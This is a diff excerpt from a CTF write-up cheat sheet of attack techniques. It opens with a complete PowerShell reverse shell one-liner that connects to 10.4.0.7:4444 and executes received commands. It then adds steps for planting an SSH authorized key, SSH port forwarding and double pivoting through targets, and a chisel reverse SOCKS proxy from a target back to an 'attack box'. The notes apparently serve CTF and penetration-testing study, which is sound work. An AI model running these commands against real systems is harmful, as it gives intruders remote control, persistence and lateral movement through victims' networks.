ChrisPritchard/ctf-writeups/TIPS-AND-TRICKS.md

 ```
 powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.4.0.7',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 ```

+## Creating authorized keys

+1. create the `.ssh` folder using mkdir
+2. echo your public key into `.ssh/authorized_keys`
+3. `chmod 700 ~/.ssh`
+4. `chmod 600 ~/.ssh/authorized_keys`

+## SSH Proxies

+**local port forwarding**: the target host 192.168.0.100 is running a service on port 8888, and you want that service available on the localhost port 7777

+`ssh -L 7777:localhost:8888 user@192.168.0.100`

+**remote port forwarding**: you are running a service on localhost port 9999, and you want that service available on the target host 192.168.0.100 port 12340

+`ssh -R 12340:localhost:9999 user@192.168.0.100`

+**Local proxy** through remote host: You want to route network traffic through a remote host target.host, so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:1080

+`ssh -C2qTnN -D 1080 user@target.host`

+(args above are compression level, quiet, run in background and no command should be run)

+**Double pivoting**, opening a socks proxy on a remote machine and forwarding that proxy so its accessible locally:

+`ssh -tt -L8080:localhost:8157 sean@10.11.1.251 ssh -t -D 8157 mario@10.1.1.1 -p 222`

+## Chisel reverse socks proxy

+Useful for pivoting, opens a socks proxy from the target to your attack box, basically so the attack box has a proxy to the target's network.

+1. Get chisel, via its release page: https://github.com/jpillora/chisel/releases/tag/v1.7.6
+2. Get a copy on the target and the attack box.
+3. Create a server on the attack box: `./chisel server -p 1337 --reverse &`
+4. From the target, connect to the attack box via `./chisel client ATTACK-BOX-IP:1337 R:socks &`

+This will open a proxy on 1080, which you can then setup via proxychains etc.

 ## Shell tricks